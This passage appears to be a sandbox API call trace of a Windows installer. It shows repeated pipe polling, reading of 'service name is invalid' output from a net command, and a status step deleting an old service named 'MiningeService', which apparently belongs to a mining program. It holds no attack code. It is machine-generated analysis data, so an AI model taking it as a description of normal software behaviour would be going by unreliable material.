nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.528] Sleep (dwMilliseconds=0x64) [0269.659] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0269.659] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0269.660] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.660] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.660] Sleep (dwMilliseconds=0x64) [0269.762] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0269.763] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0269.763] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.763] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.763] Sleep (dwMilliseconds=0x64) [0269.871] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0269.872] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0269.872] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.872] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.872] Sleep (dwMilliseconds=0x64) [0269.981] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0269.981] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0269.981] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.981] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0269.981] Sleep (dwMilliseconds=0x64) [0270.090] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0270.090] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0270.090] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.090] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.090] Sleep (dwMilliseconds=0x64) [0270.199] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0270.199] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0270.199] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x20, lpBytesLeftThisMessage=0x0) returned 1 [0270.199] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x20, lpBytesLeftThisMessage=0x0) returned 1 [0270.200] GetTickCount () returned 0x1d60afd [0270.200] ReadFile (in: hFile=0x1c, lpBuffer=0x2d73078, nNumberOfBytesToRead=0x3ff, lpNumberOfBytesRead=0x2d6fd7c, lpOverlapped=0x0 | out: lpBuffer=0x2d73078*, lpNumberOfBytesRead=0x2d6fd7c*=0x20, lpOverlapped=0x0) returned 1 [0270.200] lstrlenA (lpString="") returned 0 [0270.200] lstrlenA (lpString="The service name is invalid.\r\n\r\n") returned 32 [0270.200] GlobalSize (hMem=0x224003c) returned 0x1000 [0270.200] lstrcatA (in: lpString1="", lpString2="The service name is invalid.\r\n\r\n" | out: lpString1="The service name is invalid.\r\n\r\n") returned="The service name is invalid.\r\n\r\n" [0270.200] lstrlenA (lpString="\x09") returned 1 [0270.200] lstrlenA (lpString="The service name is invalid.\r\n\r\n") returned 32 [0270.200] lstrcmpiA (lpString1="T", lpString2="\x09") returned 1 [0270.201] lstrlenA (lpString="he service name is invalid.\r\n\r\n") returned 31 [0270.201] lstrcmpiA (lpString1="h", lpString2="\x09") returned 1 [0270.201] lstrlenA (lpString="e service name is invalid.\r\n\r\n") returned 30 [0270.202] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0270.202] lstrlenA (lpString=" service name is invalid.\r\n\r\n") returned 29 [0270.202] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.202] lstrlenA (lpString="service name is invalid.\r\n\r\n") returned 28 [0270.202] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0270.202] lstrlenA (lpString="ervice name is invalid.\r\n\r\n") returned 27 [0270.202] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0270.203] lstrlenA (lpString="rvice name is invalid.\r\n\r\n") returned 26 [0270.203] lstrcmpiA (lpString1="r", lpString2="\x09") returned 1 [0270.203] lstrlenA (lpString="vice name is invalid.\r\n\r\n") returned 25 [0270.203] lstrcmpiA (lpString1="v", lpString2="\x09") returned 1 [0270.203] lstrlenA (lpString="ice name is invalid.\r\n\r\n") returned 24 [0270.203] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0270.203] lstrlenA (lpString="ce name is invalid.\r\n\r\n") returned 23 [0270.203] lstrcmpiA (lpString1="c", lpString2="\x09") returned 1 [0270.204] lstrlenA (lpString="e name is invalid.\r\n\r\n") returned 22 [0270.204] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0270.204] lstrlenA (lpString=" name is invalid.\r\n\r\n") returned 21 [0270.204] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.204] lstrlenA (lpString="name is invalid.\r\n\r\n") returned 20 [0270.204] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0270.204] lstrlenA (lpString="ame is invalid.\r\n\r\n") returned 19 [0270.204] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0270.205] lstrlenA (lpString="me is invalid.\r\n\r\n") returned 18 [0270.205] lstrcmpiA (lpString1="m", lpString2="\x09") returned 1 [0270.205] lstrlenA (lpString="e is invalid.\r\n\r\n") returned 17 [0270.205] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0270.205] lstrlenA (lpString=" is invalid.\r\n\r\n") returned 16 [0270.205] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.205] lstrlenA (lpString="is invalid.\r\n\r\n") returned 15 [0270.205] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0270.206] lstrlenA (lpString="s invalid.\r\n\r\n") returned 14 [0270.206] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0270.206] lstrlenA (lpString=" invalid.\r\n\r\n") returned 13 [0270.206] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.206] lstrlenA (lpString="invalid.\r\n\r\n") returned 12 [0270.206] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0270.206] lstrlenA (lpString="nvalid.\r\n\r\n") returned 11 [0270.206] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0270.207] lstrlenA (lpString="valid.\r\n\r\n") returned 10 [0270.207] lstrcmpiA (lpString1="v", lpString2="\x09") returned 1 [0270.207] lstrlenA (lpString="alid.\r\n\r\n") returned 9 [0270.207] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0270.207] lstrlenA (lpString="lid.\r\n\r\n") returned 8 [0270.207] lstrcmpiA (lpString1="l", lpString2="\x09") returned 1 [0270.207] lstrlenA (lpString="id.\r\n\r\n") returned 7 [0270.207] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0270.208] lstrlenA (lpString="d.\r\n\r\n") returned 6 [0270.208] lstrcmpiA (lpString1="d", lpString2="\x09") returned 1 [0270.208] lstrlenA (lpString=".\r\n\r\n") returned 5 [0270.208] lstrcmpiA (lpString1=".", lpString2="\x09") returned 1 [0270.208] lstrlenA (lpString="\r\n\r\n") returned 4 [0270.208] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0270.208] lstrlenA (lpString="\n\r\n") returned 3 [0270.208] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0270.209] lstrlenA (lpString="\r\n") returned 2 [0270.209] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0270.209] lstrlenA (lpString="\n") returned 1 [0270.209] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0270.209] lstrlenA (lpString="") returned 0 [0270.209] lstrlenA (lpString="The service name is invalid.") returned 28 [0270.210] OemToCharBuffA (in: lpszSrc="The service name is invalid.", lpszDst=0x2ab9f8, cchDstLength=0x1c | out: lpszDst="The service name is invalid.") returned 1 [0270.210] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x7 [0270.211] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0x7 [0270.218] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x7, lParam=0x0) returned 0x1 [0270.218] lstrlenA (lpString="") returned 0 [0270.218] OemToCharBuffA (in: lpszSrc="", lpszDst=0x2aba17, cchDstLength=0x0 | out: lpszDst="") returned 1 [0270.218] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x8 [0270.218] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0x8 [0270.220] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x8, lParam=0x0) returned 0x1 [0270.220] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0270.220] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0270.220] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.220] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.220] Sleep (dwMilliseconds=0x64) [0270.324] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0270.324] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0270.324] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x36, lpBytesLeftThisMessage=0x0) returned 1 [0270.324] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x36, lpBytesLeftThisMessage=0x0) returned 1 [0270.324] GetTickCount () returned 0x1d60b7a [0270.324] ReadFile (in: hFile=0x1c, lpBuffer=0x2d73078, nNumberOfBytesToRead=0x3ff, lpNumberOfBytesRead=0x2d6fd7c, lpOverlapped=0x0 | out: lpBuffer=0x2d73078*, lpNumberOfBytesRead=0x2d6fd7c*=0x36, lpOverlapped=0x0) returned 1 [0270.324] lstrlenA (lpString="") returned 0 [0270.324] lstrlenA (lpString="More help is available by typing NET HELPMSG 2185.\r\n\r\n") returned 54 [0270.324] GlobalSize (hMem=0x224003c) returned 0x1000 [0270.324] lstrcatA (in: lpString1="", lpString2="More help is available by typing NET HELPMSG 2185.\r\n\r\n" | out: lpString1="More help is available by typing NET HELPMSG 2185.\r\n\r\n") returned="More help is available by typing NET HELPMSG 2185.\r\n\r\n" [0270.324] lstrlenA (lpString="\x09") returned 1 [0270.324] lstrlenA (lpString="More help is available by typing NET HELPMSG 2185.\r\n\r\n") returned 54 [0270.324] lstrcmpiA (lpString1="M", lpString2="\x09") returned 1 [0270.325] lstrlenA (lpString="ore help is available by typing NET HELPMSG 2185.\r\n\r\n") returned 53 [0270.325] lstrcmpiA (lpString1="o", lpString2="\x09") returned 1 [0270.326] lstrlenA (lpString="re help is available by typing NET HELPMSG 2185.\r\n\r\n") returned 52 [0270.326] lstrcmpiA (lpString1="r", lpString2="\x09") returned 1 [0270.326] lstrlenA (lpString="e help is available by typing NET HELPMSG 2185.\r\n\r\n") returned 51 [0270.326] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0270.326] lstrlenA (lpString=" help is available by typing NET HELPMSG 2185.\r\n\r\n") returned 50 [0270.326] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.327] lstrlenA (lpString="help is available by typing NET HELPMSG 2185.\r\n\r\n") returned 49 [0270.327] lstrcmpiA (lpString1="h", lpString2="\x09") returned 1 [0270.327] lstrlenA (lpString="elp is available by typing NET HELPMSG 2185.\r\n\r\n") returned 48 [0270.327] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0270.327] lstrlenA (lpString="lp is available by typing NET HELPMSG 2185.\r\n\r\n") returned 47 [0270.327] lstrcmpiA (lpString1="l", lpString2="\x09") returned 1 [0270.328] lstrlenA (lpString="p is available by typing NET HELPMSG 2185.\r\n\r\n") returned 46 [0270.328] lstrcmpiA (lpString1="p", lpString2="\x09") returned 1 [0270.328] lstrlenA (lpString=" is available by typing NET HELPMSG 2185.\r\n\r\n") returned 45 [0270.328] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.328] lstrlenA (lpString="is available by typing NET HELPMSG 2185.\r\n\r\n") returned 44 [0270.328] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0270.328] lstrlenA (lpString="s available by typing NET HELPMSG 2185.\r\n\r\n") returned 43 [0270.328] lstrcmpiA (lpString1="s", lpString2="\x09") returned 1 [0270.329] lstrlenA (lpString=" available by typing NET HELPMSG 2185.\r\n\r\n") returned 42 [0270.329] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.329] lstrlenA (lpString="available by typing NET HELPMSG 2185.\r\n\r\n") returned 41 [0270.329] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0270.329] lstrlenA (lpString="vailable by typing NET HELPMSG 2185.\r\n\r\n") returned 40 [0270.329] lstrcmpiA (lpString1="v", lpString2="\x09") returned 1 [0270.329] lstrlenA (lpString="ailable by typing NET HELPMSG 2185.\r\n\r\n") returned 39 [0270.329] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0270.330] lstrlenA (lpString="ilable by typing NET HELPMSG 2185.\r\n\r\n") returned 38 [0270.330] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0270.330] lstrlenA (lpString="lable by typing NET HELPMSG 2185.\r\n\r\n") returned 37 [0270.330] lstrcmpiA (lpString1="l", lpString2="\x09") returned 1 [0270.330] lstrlenA (lpString="able by typing NET HELPMSG 2185.\r\n\r\n") returned 36 [0270.330] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0270.330] lstrlenA (lpString="ble by typing NET HELPMSG 2185.\r\n\r\n") returned 35 [0270.330] lstrcmpiA (lpString1="b", lpString2="\x09") returned 1 [0270.331] lstrlenA (lpString="le by typing NET HELPMSG 2185.\r\n\r\n") returned 34 [0270.331] lstrcmpiA (lpString1="l", lpString2="\x09") returned 1 [0270.331] lstrlenA (lpString="e by typing NET HELPMSG 2185.\r\n\r\n") returned 33 [0270.331] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0270.331] lstrlenA (lpString=" by typing NET HELPMSG 2185.\r\n\r\n") returned 32 [0270.331] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.331] lstrlenA (lpString="by typing NET HELPMSG 2185.\r\n\r\n") returned 31 [0270.331] lstrcmpiA (lpString1="b", lpString2="\x09") returned 1 [0270.332] lstrlenA (lpString="y typing NET HELPMSG 2185.\r\n\r\n") returned 30 [0270.332] lstrcmpiA (lpString1="y", lpString2="\x09") returned 1 [0270.332] lstrlenA (lpString=" typing NET HELPMSG 2185.\r\n\r\n") returned 29 [0270.332] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.332] lstrlenA (lpString="typing NET HELPMSG 2185.\r\n\r\n") returned 28 [0270.332] lstrcmpiA (lpString1="t", lpString2="\x09") returned 1 [0270.333] lstrlenA (lpString="yping NET HELPMSG 2185.\r\n\r\n") returned 27 [0270.333] lstrcmpiA (lpString1="y", lpString2="\x09") returned 1 [0270.333] lstrlenA (lpString="ping NET HELPMSG 2185.\r\n\r\n") returned 26 [0270.333] lstrcmpiA (lpString1="p", lpString2="\x09") returned 1 [0270.333] lstrlenA (lpString="ing NET HELPMSG 2185.\r\n\r\n") returned 25 [0270.333] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0270.333] lstrlenA (lpString="ng NET HELPMSG 2185.\r\n\r\n") returned 24 [0270.333] lstrcmpiA (lpString1="n", lpString2="\x09") returned 1 [0270.334] lstrlenA (lpString="g NET HELPMSG 2185.\r\n\r\n") returned 23 [0270.334] lstrcmpiA (lpString1="g", lpString2="\x09") returned 1 [0270.334] lstrlenA (lpString=" NET HELPMSG 2185.\r\n\r\n") returned 22 [0270.334] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.334] lstrlenA (lpString="NET HELPMSG 2185.\r\n\r\n") returned 21 [0270.334] lstrcmpiA (lpString1="N", lpString2="\x09") returned 1 [0270.335] lstrlenA (lpString="ET HELPMSG 2185.\r\n\r\n") returned 20 [0270.335] lstrcmpiA (lpString1="E", lpString2="\x09") returned 1 [0270.335] lstrlenA (lpString="T HELPMSG 2185.\r\n\r\n") returned 19 [0270.335] lstrcmpiA (lpString1="T", lpString2="\x09") returned 1 [0270.335] lstrlenA (lpString=" HELPMSG 2185.\r\n\r\n") returned 18 [0270.335] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.335] lstrlenA (lpString="HELPMSG 2185.\r\n\r\n") returned 17 [0270.335] lstrcmpiA (lpString1="H", lpString2="\x09") returned 1 [0270.336] lstrlenA (lpString="ELPMSG 2185.\r\n\r\n") returned 16 [0270.336] lstrcmpiA (lpString1="E", lpString2="\x09") returned 1 [0270.336] lstrlenA (lpString="LPMSG 2185.\r\n\r\n") returned 15 [0270.336] lstrcmpiA (lpString1="L", lpString2="\x09") returned 1 [0270.336] lstrlenA (lpString="PMSG 2185.\r\n\r\n") returned 14 [0270.336] lstrcmpiA (lpString1="P", lpString2="\x09") returned 1 [0270.337] lstrlenA (lpString="MSG 2185.\r\n\r\n") returned 13 [0270.337] lstrcmpiA (lpString1="M", lpString2="\x09") returned 1 [0270.337] lstrlenA (lpString="SG 2185.\r\n\r\n") returned 12 [0270.337] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0270.337] lstrlenA (lpString="G 2185.\r\n\r\n") returned 11 [0270.337] lstrcmpiA (lpString1="G", lpString2="\x09") returned 1 [0270.337] lstrlenA (lpString=" 2185.\r\n\r\n") returned 10 [0270.338] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0270.338] lstrlenA (lpString="2185.\r\n\r\n") returned 9 [0270.338] lstrcmpiA (lpString1="2", lpString2="\x09") returned 1 [0270.338] lstrlenA (lpString="185.\r\n\r\n") returned 8 [0270.338] lstrcmpiA (lpString1="1", lpString2="\x09") returned 1 [0270.338] lstrlenA (lpString="85.\r\n\r\n") returned 7 [0270.338] lstrcmpiA (lpString1="8", lpString2="\x09") returned 1 [0270.338] lstrlenA (lpString="5.\r\n\r\n") returned 6 [0270.339] lstrcmpiA (lpString1="5", lpString2="\x09") returned 1 [0270.339] lstrlenA (lpString=".\r\n\r\n") returned 5 [0270.339] lstrcmpiA (lpString1=".", lpString2="\x09") returned 1 [0270.340] lstrlenA (lpString="\r\n\r\n") returned 4 [0270.340] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0270.341] lstrlenA (lpString="\n\r\n") returned 3 [0270.341] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0270.341] lstrlenA (lpString="\r\n") returned 2 [0270.341] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0270.341] lstrlenA (lpString="\n") returned 1 [0270.341] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0270.341] lstrlenA (lpString="") returned 0 [0270.341] lstrlenA (lpString="More help is available by typing NET HELPMSG 2185.") returned 50 [0270.342] OemToCharBuffA (in: lpszSrc="More help is available by typing NET HELPMSG 2185.", lpszDst=0x2ab9f8, cchDstLength=0x32 | out: lpszDst="More help is available by typing NET HELPMSG 2185.") returned 1 [0270.342] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x9 [0270.342] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0x9 [0270.345] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x9, lParam=0x0) returned 0x1 [0270.345] lstrlenA (lpString="") returned 0 [0270.345] OemToCharBuffA (in: lpszSrc="", lpszDst=0x2aba2d, cchDstLength=0x0 | out: lpszDst="") returned 1 [0270.345] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0xa [0270.345] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0xa [0270.346] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0xa, lParam=0x0) returned 0x1 [0270.346] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0270.347] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0270.347] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.347] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.347] Sleep (dwMilliseconds=0x64) [0270.449] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0270.449] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0270.450] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.450] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.450] Sleep (dwMilliseconds=0x64) [0270.854] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x0 [0270.854] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x2) returned 1 [0270.854] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0270.854] wsprintfA (in: param_1=0x2d6fc5c, param_2="%d" | out: param_1="2") returned 1 [0270.854] lstrcpynA (in: lpString1=0x2ab0dc, lpString2="2", iMaxLength=1024 | out: lpString1="2") returned="2" [0270.854] CloseHandle (hObject=0x218) returned 1 [0270.854] CloseHandle (hObject=0x21c) returned 1 [0270.855] CloseHandle (hObject=0x20c) returned 1 [0270.855] CloseHandle (hObject=0x1c) returned 1 [0270.855] CloseHandle (hObject=0x214) returned 1 [0270.855] CloseHandle (hObject=0x210) returned 1 [0270.855] GlobalUnlock (hMem=0x224003c) returned 0 [0270.856] FreeLibrary (hLibModule=0x2d70000) returned 1 [0270.857] MulDiv (nNumber=30, nNumerator=30000, nDenominator=60) returned 15000 [0270.857] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x3a98, lParam=0x0) returned 0x38a4 [0270.912] lstrcpynA (in: lpString1=0x42a048, lpString2="Delete the old service MiningeService...", iMaxLength=1024 | out: lpString1="Delete the old service MiningeService...") returned="Delete the old service MiningeService..." [0270.912] lstrlenA (lpString="Delete the old service MiningeService...") returned 40 [0270.913] SetWindowTextA (hWnd=0x20324, lpString="Delete the old service MiningeService...") returned 1 [0270.915] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0xb [0270.916] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0xb [0270.984] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0xb, lParam=0x0) returned 0x1 [0270.986] MulDiv (nNumber=31, nNumerator=30000, nDenominator=60) returned 15500 [0270.986] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x3c8c, lParam=0x0) returned 0x3a98 [0270.986] lstrcpynA (in: lpString1=0x42e3a0, 